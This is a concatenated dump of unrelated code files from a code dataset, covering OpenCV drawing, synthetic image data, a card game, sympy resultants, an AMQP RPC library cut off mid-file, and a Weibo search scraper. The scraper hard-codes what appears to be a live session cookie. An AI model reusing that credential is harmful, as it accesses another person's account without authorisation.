gpoints[green_index].appendleft(center)\n elif colorIndex == 2:\n rpoints[red_index].appendleft(center)\n elif colorIndex == 3:\n ypoints[yellow_index].appendleft(center)\n \n#Додаєм наступні deques, коли нічого не виявлено, щоб уникнути плутанини\n else:\n bpoints.append(deque(maxlen=512))\n blue_index += 1\n gpoints.append(deque(maxlen=512))\n green_index += 1\n rpoints.append(deque(maxlen=512))\n red_index += 1\n ypoints.append(deque(maxlen=512))\n yellow_index += 1\n\n # Малюємо лінії \n points = [bpoints, gpoints, rpoints, ypoints]\n for i in range(len(points)):\n for j in range(len(points[i])):\n for k in range(1, len(points[i][j])):\n if points[i][j][k - 1] is None or points[i][j][k] is None:\n continue\n cv2.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 2)\n cv2.line(paintWindow, points[i][j][k - 1], points[i][j][k], colors[i], 2)\n\n # Показуємо вікна \n cv2.imshow(\"Tracking\", frame)\n cv2.imshow(\"Paint\", paintWindow)\n cv2.imshow(\"mask\",Mask)\n\n\t# Якщо натиснути кнопку \"с\" то програма закриється \n if cv2.waitKey(1) & 0xFF == ord(\"c\"):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Lordcode2k18/The-practical-part-of-the-bachelor-s-thesis","sub_path":"dyplom.py","file_name":"dyplom.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12396231044","text":"import sys\nimport numpy as np\nfrom scipy.stats import beta\nfrom scipy.ndimage import gaussian_filter\nfrom matplotlib.path import Path as mpath\n\n# s = 2 sqrt(3) r\n# h = sqrt(3)/2 s\n# h = 3r\n\ndef make(n, side_len, circ_rad, theta, ishift=0, jshift=0,\n sigma_smooth=0., sigma_noise=0., rs=None):\n \"\"\"\n Create an illusory triangle contour [1] image with random\n size and orientation.\n\n [1]: https://en.wikipedia.org/wiki/Illusory_contours\n\n Parameters\n ----------\n n: int\n Image shape will be (n,n)\n\n side_len: float\n Side length of the triangle in pixels.\n\n circ_rad: float\n Radius of the circles at the vertices\n of the triangle in pixels.\n\n theta: float (radians)\n Rotation of the triangle. Zero points the triangle to the right.\n\n ishift,jshift: integers\n Translate the center of the triangle by ishift and jshift.\n\n sigma_smooth: float\n Gaussian smoothing parameter (make image borders more diffuse).\n\n sigma_noise: float\n Additive noise amplitude.\n\n rs: numpy.random.RandomState, default=None\n Include for reproducible results.\n \"\"\"\n if circ_rad > 0.5*side_len:\n raise ValueError((\"Circle radius should be less \"\n \"than one half the side length.\"))\n\n # Triangle height.\n height = 0.5*np.sqrt(3)*side_len\n\n # Distance from center of triangle to a vertex.\n tri_rad = (2.0/3.0)*height\n\n # Rotation factor for triangle vertices.\n w = (2.0/3.0)*np.pi\n\n # Get extent of triangle plus outer circles for validation.\n extent = np.zeros((3,2))\n for i in range(3):\n x = (tri_rad+circ_rad)*np.cos(i*w+theta) + n/2 + jshift\n y = (tri_rad+circ_rad)*np.sin(i*w+theta) + n/2 - ishift\n extent[i] = n-y,x\n\n for e in extent:\n if e[0] < 0 or e[0] > n-1:\n raise ValueError((\"Extent of triangle plus circles exceeds\"\n \"image dimensions along axis 0.\"))\n if e[1] < 0 or e[1] > n-1:\n raise ValueError((\"Extent of triangle plus circles exceeds\"\n \"image dimensions along axis 1.\"))\n\n vertices = np.zeros((3,2))\n for i in range(3):\n x = tri_rad*np.cos(i*w+theta) + n/2 + jshift\n y = tri_rad*np.sin(i*w+theta) + n/2 - ishift\n vertices[i] = n-y,x\n\n tri_path = mpath(np.append(vertices, vertices[-1].reshape(1,2), axis=0),\n codes=[mpath.MOVETO, mpath.LINETO,\n mpath.LINETO, mpath.CLOSEPOLY])\n\n ii,jj = np.indices((n,n))\n coords = np.c_[ii.flatten(), jj.flatten()]\n\n triangle = tri_path.contains_points(coords).reshape(n,n)\n\n ucircle = mpath.unit_circle()\n circles = np.zeros((n,n), dtype=np.bool)\n\n for v in vertices:\n circle = mpath(vertices=ucircle.vertices*circ_rad + v,\n codes=ucircle.codes)\n circles = np.logical_or(circles,\n circle.contains_points(coords).reshape(n,n))\n \n image = (~np.logical_and(circles, ~triangle)).astype(np.float)\n rs = rs if rs is not None else np.random.RandomState()\n\n if sigma_smooth > 0:\n image = gaussian_filter(image, sigma_smooth)\n\n if sigma_noise > 0:\n image += sigma_noise*rs.randn(n,n)\n\n return image, triangle\n\ndef make_dataset(N, n=101, slen=[40,60], crad=[10,20],\n shift=[-0, 0], nsig=[0.05,0.15], ssig=[1,1],\n theta=[0,2*np.pi/3], random_state=None, verbose=True):\n \"\"\"\n Make a randomly generated dataset of illusory triangle data.\n\n Parameters\n ----------\n N: int\n The number of examples.\n\n n: int\n The image size.\n\n slen: list, len=2\n Interval of triangle side lengths from which to sample.\n\n crad: list, len=2\n Interval of circle radii from which to sample.\n\n shift: list, len=2\n The interval of shift values from which to sample.\n\n nsig: list, len=2\n The interval of values from which to sample `sigma_noise`. \n\n ssig: list, len=2\n The interval of values from which to sample `sigma_smooth`. \n\n ctheta: list, len=2\n The interval of values form which to sample `theta`.\n\n return_meta: bool, default=False\n Return a list of meta data attributes for each example if True.\n\n random_state: numpy.random.RandomState, default=None\n Include a for reproducible results.\n\n verbose: bool, default=True\n Print progress.\n \"\"\"\n random_state = random_state if random_state is not None else np.random.RandomState()\n def betarvs(**kwargs):\n return beta.rvs(3, 3, random_state=random_state, **kwargs)\n\n if verbose:\n q = len(str(N))\n pstr = \"Creating dataset ... %%0%dd / %d\" % (q,N)\n\n imgs = np.zeros((N, n, n))\n segs = np.zeros((N, n, n), dtype=np.bool)\n\n i = 0\n\n while i < N:\n try:\n sl = betarvs(loc=slen[0],scale=slen[1]-slen[0])\n cr = betarvs(loc=crad[0],scale=crad[1]-crad[0])\n\n ishift,jshift = betarvs(loc=shift[0],\n scale=shift[1]-shift[0], size=2)\n th = betarvs(loc=theta[0],scale=theta[1]-theta[0])\n\n sigma_noise = betarvs(loc=nsig[0], scale=nsig[1]-nsig[0])\n sigma_smooth = betarvs(loc=ssig[0], scale=ssig[1]-ssig[0])\n\n meta = dict(\n side_len=sl,\n circ_rad=cr,\n ishift=ishift,\n jshift=jshift,\n theta=th,\n sigma_smooth=sigma_smooth,\n sigma_noise=sigma_noise\n )\n\n img,seg = make(n, sl, cr, th, ishift, jshift,\n sigma_smooth, sigma_noise, rs=random_state)\n imgs[i] = img\n segs[i] = seg\n i+=1\n\n if verbose: print(pstr % i)\n except ValueError:\n continue\n return imgs, segs\n","repo_name":"notmatthancock/level-set-machine-learning","sub_path":"lsml/data/dim2/gestalt_triangle.py","file_name":"gestalt_triangle.py","file_ext":"py","file_size_in_byte":5907,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"1845117548","text":"from const import *\nfrom buff import *\n\ndef init(self, mode = True):\n self.name = \"伊瓦尔之书\"\n self.description = \"随机召唤一个法师。\"\n self.original = False\n self.typ = CARD_SPELL\n self.subtype = [SUBTYPE_BOOK]\n self.originalcost = [0, 0, 2, 0, 0, 0] #White Fire Water Tree Light Death\n \n if mode:\n self.cost = self.originalcost.copy()\n self.needtarget = False\n \n buff = Buff(self.system, \"b0000000024_000\", self, self)\n self.add_buff(buff)\n \n\n\n \n","repo_name":"zblcm/python-StoneAsh","sub_path":"server/cards/c0000000024.py","file_name":"c0000000024.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1449238386","text":"import torch.nn as nn\nfrom .utils import named2dim_tensor\n\nclass QModule(nn.Module):\n def get_named_tensor(self, name):\n if '_parameters' in self.__dict__:\n _parameters = self.__dict__['_parameters']\n if name in _parameters:\n return _parameters[name]\n if '_buffers' in self.__dict__:\n _buffers = self.__dict__['_buffers']\n if name in _buffers:\n return _buffers[name]\n return None\n\n def __getattr__(self, name):\n tensor = self.get_named_tensor(name)\n if tensor is not None:\n if not hasattr(self, \"_platedims\"):\n raise Exception(\"Cannot return parameter or buffer, as self._platedims is not set. To set self._platedims, you need to pass Q to a Model.\")\n return named2dim_tensor(self._platedims, tensor)\n else:\n return super().__getattr__(name)\n\n","repo_name":"ThomasHeap/MPRW-S","sub_path":"alan/qmodule.py","file_name":"qmodule.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28774470890","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\nHey Katie\n\nI’d be keen to know the percentage of data, as well as days of data (>90%), available for each WAP that should be reported (>5l/s) for all consents associated with Irrigation schemes?\n\nThanks, Eila\n\"\"\"\n\n\"\"\"\nCreated on Wed Sep 4 10:00:52 2019\n\n@author: KatieSi\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport pdsql\nfrom datetime import datetime, timedelta\n\n\nTelemetryFromDate = '2018-07-01'\nTelemetryToDate = '2019-06-30'\n\nBaseline = pd.read_csv(r\"D:\\\\Implementation Support\\\\Python Scripts\\\\scripts\\\\Segmentation2019\\\\Baseline.csv\")\n\nIrrigation = pd.read_csv(r\"D:\\\\Implementation Support\\\\Python Scripts\\\\scripts\\\\Import\\\\IrrigationSchemes.csv\")\nIrrigation['Activity'] = Irrigation['Activity'].str.strip().str.lower()\n\nIrrigation = pd.merge(Irrigation, Baseline, on = ['ConsentNo','WAP', 'Activity'], how = 'left')\n\n\nIrrigation = Irrigation[[\n 'Organisation',\n 'ConsentNo',\n 'Activity',\n 'WAP',\n 'WellStatus', \n 'Waiver', \n 'WAPsOnConsent',\n 'ConsentsOnWAP',\n 'WAPRate', \n 'T_DaysOfData'\n ]]\n\nIrrigation = Irrigation.drop_duplicates()\nIrrigation[['T_DaysOfData']] = Irrigation[['T_DaysOfData']].fillna(value=0)\nIrrigation = Irrigation[Irrigation['WAPRate'] >= 5]\n\nIrrigation['PercentOfData'] = Irrigation['T_DaysOfData']/365 *100\nIrrigation['PercentOfData'] = Irrigation['PercentOfData'].round(0).astype(int)\n\nIrrigation.rename(columns={'T_DaysOfData': 'DaysOfData'}, inplace=True)\n\n\nIrrigation.to_csv('Irrigation.csv')\n","repo_name":"Data-to-Knowledge/IrrigationCompanies","sub_path":"IrrigationCompanies.py","file_name":"IrrigationCompanies.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40952838047","text":"import csv\nfrom collections import defaultdict\n\nimport requests\n\nCSV_URL = 'https://bit.ly/2HiD2i8'\n\n\ndef get_csv():\n \"\"\"Use requests to download the csv and return the\n decoded content\"\"\"\n r = requests.get(CSV_URL)\n return r.text\n\n\ndef create_user_bar_chart(content):\n \"\"\"Receives csv file (decoded) content and returns a table of timezones\n and their corresponding member counts in pluses (see Bite/tests)\"\"\"\n reader = csv.DictReader(content.splitlines())\n tz_map = defaultdict(list)\n for line in reader:\n tz = line['tz']\n if '/' in tz:\n tz_map[tz].append('+')\n for tz, users in sorted(tz_map.items()):\n print(f\"{tz:21}| {''.join(users)}\")\n\ncreate_user_bar_chart(get_csv())\n\ndef get_csv():\n \"\"\"Use requests to download the csv and return the\n decoded content\"\"\"\n with requests.Session() as s:\n download = s.get(CSV_URL)\n return download.content.decode('utf-8')\n\n\ndef create_user_bar_chart(content):\n \"\"\"Receives csv file (decoded) content and returns a table of timezones\n and their corresponding member counts in pluses (see Bite/tests)\"\"\"\n reader = csv.DictReader(content.splitlines(), delimiter=',')\n for row in reader:\n tz = row['tz']\n timezones[tz] += 1\n\n for location, count in sorted(timezones.items()):\n print(f'{location:<20} | {\"+\"*count}')\n","repo_name":"natenka/100-days-of-Python","sub_path":"talkpython-100-days/day023/intermediate/bite_079.py","file_name":"bite_079.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"30964698487","text":"from microbit import *\nimport radio\n\nPREFIX = \"ROV:\"\n\nradio.on()\nradio.config(channel=5, address = 0xffffffff)\n\nwhile True:\n if button_a.was_pressed():\n radio.send(PREFIX + \"CORRECT\")\n display.show(Image.ARROW_N)\n sleep(500)\n \n if button_b.was_pressed():\n radio.send(PREFIX + \"INCORRECT\")\n display.show(Image.ARROW_S)\n sleep(500)\n \n display.clear()","repo_name":"ncss/projects-2017-5","sub_path":"project-C/Test Controller.py","file_name":"Test Controller.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74106498028","text":"import sympy as sym\nimport itertools\nfrom printing import print_coeffs, print_matrix\nimport string\nRat = sym.Rational\nMat = sym.Matrix\nSym = sym.symbols\nHalf = Rat(1,2)\nThird = Rat(1,3)\nQuarter = Rat(1,4)\ndef Rec(n):\n return Rat(1, n)\n\n\ndef sylvester_matrix(p, q):\n degp = len(p)-1\n degq = len(q)-1\n n = degp + degq\n M = [[0 for _ in range(n)] for __ in range(n)]\n for i in range(degq):\n for j in range(degp+1):\n M[i+j][i] = p[j]\n for i in range(degp):\n for j in range(degq+1):\n M[i+j][degq+i] = q[j]\n return sym.Matrix(M)\n\ndef resultant(p, q):\n return sylvester_matrix(p, q).det()\n\n\ndef general_discriminant(degree):\n assert(degree <= 25)\n variables = sym.symbols(\" \".join(string.ascii_lowercase[:degree+1]))\n p = variables[::-1]\n pp = [i*p[i] for i in range(1, len(p))]\n print_matrix(sylvester_matrix(p, pp))\n return (-(1/variables[0]) * resultant(p, pp)).expand()\n\n\n\nS = sylvester_matrix([1,-1,3,-3], [3,-1,-2])\nprint_matrix(S)\nprint(S.det())\n\nprint(general_discriminant(2))\nprint(general_discriminant(3))\n","repo_name":"LucasPayne/python_math","sub_path":"resultants.py","file_name":"resultants.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29481849525","text":"\r\nfrom datetime import datetime, timedelta\r\nimport requests\r\nfrom lxml import etree\r\nfrom threading import Thread as PyThread\r\nimport spider\r\n\r\n\r\ndef findfirsttime(keywords, start, end):\r\n yourcookie = 'SINAGLOBAL=2603107289436.293.1675522222904; UOR=,,cn.bing.com; wvr=6; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5.Aap9wgTyUKMB.F4zxYcd5JpX5KMhUgL.FoMfehn01KzpeK52dJLoIp7LxKML1KBLBKnLxKqL1hnLBoMpe0eR1KepS0ME; ALF=1678603839; SSOLoginState=1676011839; SCF=AlD7SMY5okWeWCTQax_FsWfB5IKJ_EOx_Ixm1Fb1ReZUZ_DS8KLNKHVyarYuWgPBbxk1xzz7woABRgdS5WKhnug.; SUB=_2A25O4ZlvDeRhGeFL61oS-SzNyjyIHXVtlo2nrDV8PUNbmtANLXf_kW9NQpkafH0cuExd4GX-DNaoq9FFCrCALl_q; _s_tentry=weibo.com; Apache=411274957712.8527.1676011848869; ULV=1676011848902:6:6:5:411274957712.8527.1676011848869:1675954171555'\r\n # keywords = input(\"输入关键字:\")\r\n # start = input(\"输入起始时间:\")\r\n # end = input(\"输入终止时间:\")\r\n keywords = keywords\r\n start = start\r\n end = end\r\n pages = 1 #############\r\n is_data = 1\r\n url = 'https://s.weibo.com/weibo?q={0}&typeall=1&suball=1×cope=custom:{1}:{2}&Refer=g&page={3}'.format(\r\n keywords,\r\n start, end,\r\n pages)\r\n header = {\r\n 'authority': 's.weibo.com',\r\n 'method': 'GET',\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36',\r\n 'cookie': yourcookie\r\n # 'referer':url\r\n }\r\n # now=datetime.now()\r\n # print(datetime.strptime(end,\"%Y-%m-%d\").date())\r\n # print((datetime.strptime(end,\"%Y-%m-%d\").date()-datetime.strptime(start,\"%Y-%m-%d\").date()).days)\r\n # print(now-timedelta(days=0.5))\r\n\r\n response = requests.get(url=url, headers=header)\r\n context = response.text\r\n\r\n # 提取时间\r\n tree = etree.HTML(context)\r\n # 检查是否有返回结果\r\n result = tree.xpath('//div[@class=\"card card-no-result s-pt20b40\"]')\r\n\r\n if len(result) == 1:\r\n print(\"没有找到相关结果\")\r\n is_data = 0\r\n else:\r\n l = datetime.strptime(start, \"%Y-%m-%d\").date()\r\n r = datetime.strptime(end, \"%Y-%m-%d\").date()\r\n thedays = (r - l).days\r\n # print(thedays)\r\n flag = 1\r\n value1 = 0\r\n while flag == 1:\r\n if thedays != 1:\r\n if is_data == 1:\r\n value1 = thedays % 2\r\n thedays = int(thedays / 2)\r\n r = r - timedelta(days=thedays + value1)\r\n else:\r\n r = r + timedelta(days=thedays + value1)\r\n l = l + timedelta(days=thedays + value1)\r\n\r\n else:\r\n print(\"开始日期是:{0}到{1}之间\".format(l,r))\r\n # print(tkinter.messagebox.showinfo('溯源结果',\"第一条消息的日期是:{0}到{1}之间\".format(l,r)))\r\n thread_searchold=PyThread(target=spider.search,args=(keywords, l, r,2))\r\n thread_searchold.setDaemon(True)\r\n thread_searchold.start()\r\n flag = 0\r\n break\r\n url = 'https://s.weibo.com/weibo?q={0}&typeall=1&suball=1×cope=custom:{1}:{2}&Refer=g&page={3}'.format(\r\n keywords, str(l), str(r), pages)\r\n response = requests.get(url=url, headers=header)\r\n context = response.text\r\n tree = etree.HTML(context)\r\n result = tree.xpath('//div[@class=\"card card-no-result s-pt20b40\"]')\r\n if len(result) == 1:\r\n is_data = 0\r\n # print(\"没有\")\r\n else:\r\n is_data = 1\r\n # user_name = tree.xpath(\r\n # '//div[@class=\"m-wrap\"]/div[1]/div[2]/div[{0}]//div[@class=\"content\"]/div/div[2]/a[1]/text()'.format(\r\n # 1))[0]\r\n # print(user_name)\r\n # print(\"{0}-----------{1}\".format(l,r))\r\n\r\n # return r\r\n\r\n\r\nif __name__ == \"__main__\":\r\n findfirsttime('李白', '2022-1-1', '2023-1-2')\r\n","repo_name":"beiluoqingkong/weibospider","sub_path":"shuoyuan/findtime.py","file_name":"findtime.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10377577031","text":"import pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n\r\n#/////////////////////////////////////////////////////////////////////////\r\n\r\nscreen = pygame.display.set_mode((640, 460))\r\nscreen.fill((255, 255, 255))\r\npygame.display.set_caption('Bubble Buster!')\r\n\r\n#///////////////////////////////////////////////////////////////////////\r\n\r\n#create and set up values for the player\r\nplayer = pygame.Rect(300, 400, 60, 10)\r\nplayer_speed = 3\r\n\r\nmove_left = False\r\nmove_right = False\r\n\r\n#///////////////////////////////////////////////////////////////////////\r\n\r\ndef draw_screen():\r\n screen.fill((255, 255, 255))\r\ndef draw_player():\r\n pygame.draw.rect(screen, (0, 0, 0), player)\r\n\r\n#///////////////////////////////////////////////////////////////////////\r\n\r\n#values for all bubbles to use\r\nall_bubbles = []\r\n\r\nbubble_radius = 20\r\nbubble_edge = 1\r\ninitial_bubble_position = 70\r\nbubble_spacing = 60\r\n\r\n#////////////////////////////////////////////////////////////////////////\r\n\r\ndef create_bubbles():\r\n bubble_x = initial_bubble_position\r\n bubble_y = initial_bubble_position\r\n\r\n for rows in range(0, 3):\r\n for columns in range(0, 10):\r\n bubble = pygame.draw.circle((screen), (0, 0, 0), (bubble_x, bubble_y), bubble_radius, bubble_edge)\r\n bubble_x += bubble_spacing\r\n all_bubbles.append(bubble)\r\n bubble_y += bubble_spacing\r\n bubble_x = initial_bubble_position\r\n\r\n\r\n\r\ncreate_bubbles()\r\n\r\ndef draw_bubbles():\r\n for bubble in all_bubbles:\r\n bubble = pygame.draw.circle((screen), (0, 0, 0), (bubble.x, bubble.y), bubble_radius, bubble_edge)\r\n\r\nwhile True:\r\n # check for events\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n #Keyboard input for players\r\n if event.type == KEYDOWN:\r\n if event.key == K_a:\r\n move_right = False\r\n move_left = True\r\n if event.key == K_d:\r\n move_left = False\r\n move_right = True\r\n if event.type == KEYUP:\r\n if event.key == K_a:\r\n move_left = False\r\n if event.key == K_d:\r\n move_right = False\r\n\r\n #Move the player\r\n if move_left and player.left > 0:\r\n player.x -= player_speed\r\n if move_right and player.right < 640:\r\n player.x += player_speed\r\n\r\n draw_screen()\r\n draw_player()\r\n draw_bubbles()\r\n pygame.display.update()\r\n","repo_name":"mtruesda/IDTechCamp","sub_path":"BubbleRun.py","file_name":"BubbleRun.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2440941855","text":"import FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\nimport os\n\nfrom esdqmconfig import config\n\noptions = VarParsing('analysis')\noptions.register('generalTag', default = 'GLOBAL', mult = VarParsing.multiplicity.singleton, mytype = VarParsing.varType.string)\noptions.register(\"runType\",default = \"COSMIC\", mult = VarParsing.multiplicity.singleton, mytype = VarParsing.varType.string)\noptions.parseArguments()\n\nos.environ[\"TNS_ADMIN\"] = \"/etc\"\n\nprocess = cms.Process(\"DQMDB\")\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.load(\"DQM.ESMonitorDbModule.ESCondDBWriter_cfi\")\n# process.ESCondDBWriter.DBName = config.dbwrite.dbName\n# process.ESCondDBWriter.userName = config.dbwrite.dbUserName\n# process.ESCondDBWriter.password = config.dbwrite.dbPassword\n# process.ESCondDBWriter.hostName = config.dbwrite.dbHostName\n# process.ESCondDBWriter.hostPort = int(config.dbwrite.dbHostPort)\nprocess.ESCondDBWriter.location = 'P5_Co'\nprocess.ESCondDBWriter.runType = options.runType \nprocess.ESCondDBWriter.runGeneralTag = options.generalTag\nprocess.ESCondDBWriter.monRunGeneralTag = 'CMSSW-offline-private'\nprocess.ESCondDBWriter.inputRootFiles = cms.untracked.vstring(options.inputFiles)\nprocess.ESCondDBWriter.verbosity = 2\n\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.DQMStore.verbose = 5\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(1)\n)\n\nprocess.load(\"Configuration.StandardSequences.GeometryRecoDB_cff\")\nprocess.load(\"DQM.Integration.config.FrontierCondition_GT_cfi\")\n# process.load(\"DQM.Integration.config.FrontierCondition_GT_autoExpress_cfi\")\n# from Configuration.StandardSequences.FrontierConditions_GlobalTag_cff import *\n# from Configuration.AlCa.GlobalTag import GlobalTag as gtCustomise\n# GlobalTag = gtCustomise(GlobalTag, 'auto:run2_data', '')\n\nprocess.MessageLogger = cms.Service('MessageLogger',\n destinations = cms.untracked.vstring('cout'),\n categories = cms.untracked.vstring('ESDQM'),\n cout = cms.untracked.PSet(\n threshold = cms.untracked.string('INFO'),\n ESDQM = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n default = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n )\n )\n)\nprocess.p = cms.Path(process.ESCondDBWriter)\n","repo_name":"tanmaymudholkar/ESPedestalsAutomationHelper","sub_path":"writeESDB_cfg.py","file_name":"writeESDB_cfg.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"172897881","text":"from kfp.components import InputPath\nfrom typing import NamedTuple\n\n\ndef eval_xgboost(\n test_path:InputPath('CSV'),\n modelname:str,\n modelregistry:str,\n access_key_id:str,\n acces_key_secret:str,\n)-> NamedTuple('EvalOutputs', [('eval_accuracy', float),('eval_roc_auc_score', float)]):\n \n import pandas as pd\n import boto3\n import tempfile\n import joblib\n from xgboost import XGBClassifier\n from collections import namedtuple\n from sklearn.metrics import accuracy_score, roc_auc_score\n \n test_data = pd.read_csv(test_path)\n \n X_test = test_data.drop([\"salary\"], axis=1)\n y_test = test_data[\"salary\"].to_list()\n \n with tempfile.TemporaryFile() as fp:\n s3_client = boto3.client('s3',aws_access_key_id=access_key_id,aws_secret_access_key=acces_key_secret)\n s3_client.download_fileobj(Fileobj=fp, Bucket=modelregistry, Key=modelname)\n fp.seek(0)\n xgb_model = joblib.load(fp)\n \n y_pred = xgb_model.predict(X_test)\n roc_auc = roc_auc_score(y_test,y_pred)\n accuracy = accuracy_score(y_test,y_pred)\n \n output = namedtuple(\"EvalOutputs\",[\"eval_accuracy\",\"eval_roc_auc_score\"])\n return output(accuracy, roc_auc)\n\n\nif __name__ == \"__main__\":\n\n from kfp.components import create_component_from_func\n eval_xgboost_op = create_component_from_func(\n eval_xgboost, output_component_file=\"../components_yaml/eval_xgboost_component.yaml\", \n base_image= \"python:3.8\",\n packages_to_install = [\"boto3\",\"pandas\",\"scikit-learn\",\"xgboost\"]\n )","repo_name":"BADJEMM98/cas-pratique-kubeflow","sub_path":"src/kf_components/model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8241044470","text":"# -*- coding: utf-8 -*-\n\"\"\"Async RPC library based on AMQP protocol.\n\"\"\"\nimport asyncio\nimport inspect\nimport json\n\nimport counter\nimport msgpack\n\n\nasync def server_codec(connection, name, formatter):\n \"\"\"Create RPC server codec.\n\n The codec can be used to register a service which can be a class or a\n function. The function or a class method should accept only 1 argument to\n be a service endpoint. This approach was choosen to mimic golang net/rpc\n library for easy integration with it.\n\n Args:\n connection: AMQP connection.\n name: Codec name is used for routing messages to services registered\n in the codec.\n formatter: Contains methods pack(data) and unpack(data) to translate\n a python object to/from bynary representation.\n\n Returns:\n RPC server codec.\n \"\"\"\n channel = await connection.channel()\n codec = _ServerCodec(channel)\n\n async def onrequest(channel, body, envelope, properties):\n response = await _get_response(codec.callables, body, properties,\n formatter)\n await channel.basic_publish(**response)\n\n await channel.queue_declare(queue_name=name)\n await channel.basic_consume(onrequest, no_ack=True, queue_name=name)\n\n return codec\n\n\nasync def client_codec(connection, name, formatter):\n \"\"\"Create RPC client codec.\n\n The codec can be used to create RPC clients.\n\n Args:\n connection: AMQP connection.\n name: Codec name is used for routing messages to services registered\n in the codec.\n formatter: Contains methods pack(data) and unpack(data) to translate\n a python object to/from bynary representation.\n\n Returns:\n RPC client codec.\n\n \"\"\"\n channel = await connection.channel()\n queue = await channel.queue_declare(\"\")\n codec = _ClientCodec(channel, name, queue[\"queue\"], formatter)\n\n async def onresponse(channel, body, envelope, properties):\n request = codec.reqgen.requests.pop(int(properties.message_id), None)\n if request:\n request.response.headers = properties.headers or {}\n if \"error\" not in request.response.headers:\n request.response.body = formatter.unpack(body)\n request.event.set()\n\n await channel.basic_consume(\n onresponse, no_ack=True, queue_name=queue[\"queue\"])\n\n return codec\n\n\nasync def _get_response(callables, body, properties, formatter):\n if properties.reply_to is None:\n raise ValueError(\"properties.reply_to cannot be None\")\n\n response = {\n \"exchange_name\": \"\",\n \"routing_key\": properties.correlation_id,\n \"properties\": {\n \"correlation_id\": properties.correlation_id,\n \"message_id\": properties.message_id,\n \"reply_to\": properties.reply_to\n }\n }\n\n func = callables.get(properties.reply_to)\n result = None\n\n if func:\n args = formatter.unpack(body)\n try:\n if inspect.iscoroutinefunction(func):\n result = await func(args)\n else:\n result = func(args)\n except Exception as ex:\n response[\"properties\"][\"headers\"] = {\"error\": str(ex)}\n else:\n response[\"properties\"][\"headers\"] = {\n \"error\": \"unknown function {0}\".format(properties.reply_to)\n }\n\n response[\"payload\"] = formatter.pack(result)\n return response\n\n\nclass MsgPack:\n \"\"\"Represents msgpack format provider.\n \"\"\"\n\n @staticmethod\n def pack(data):\n return msgpack.packb(data)\n\n @staticmethod\n def unpack(data):\n return msgpack.unpackb(data, encoding=\"utf-8\")\n\n\nclass Json:\n \"\"\"Represents json format provider.\n \"\"\"\n\n @staticmethod\n def pack(data):\n return json.dumps(data)\n\n @staticmethod\n def unpack(data):\n return json.loads(data, encoding=\"utf-8\")\n\n\nclass _RequestGenerator:\n \"\"\"Rperesents request generator.\n \"\"\"\n\n def __init__(self):\n self.requests = {}\n self.counter = counter.UInt64()\n\n def __call__(self):\n num = self.counter.inc()\n req = _Request(num)\n self.requests[num] = req\n return req\n\n\nclass _Response:\n \"\"\"Represents RPC response.\n \"\"\"\n\n def __init__(self):\n self.headers = None\n self.body = None\n\n\nclass _Request:\n \"\"\"Represents RPC request.\n \"\"\"\n\n def __init__(self, num):\n self.num = num\n self.event = asyncio.Event()\n self.response = _Response()\n\n\n# TODO(vbogretsov): consider using of conext manager interface.\nclass _Codec:\n \"\"\"Base codec.\n \"\"\"\n\n def __init__(self, channel):\n self.channel = channel\n\n async def close(self):\n if self.channel.is_open:\n await self.channel.close()\n\n\nclass _ServerCodec(_Codec):\n \"\"\"Represents server RPC codec.\n \"\"\"\n\n def __init__(self, channel):\n super(_ServerCodec, self).__init__(channel)\n self.callables = {}\n\n def register(self, server):\n name = getattr(server, \"__name__\", server.__class__.__name__)\n\n if callable(server):\n self.callables[name] = server\n\n for attrname in dir(server):\n if not attrname.startswith(\"_\"):\n attr = getattr(server, attrname)\n # TODO(vbogretsov): check function has 1 argument.\n if callable(attr):\n fullname = \"{0}.{1}\".format(name, attrname)\n self.callables[fullname] = attr\n\n\nclass _ClientCodec(_Codec):\n \"\"\"Represents client RPC codec.\n \"\"\"\n\n def __init__(self, channel, routing_key, correlation_id, formatter):\n super(_ClientCodec, self).__init__(channel)\n 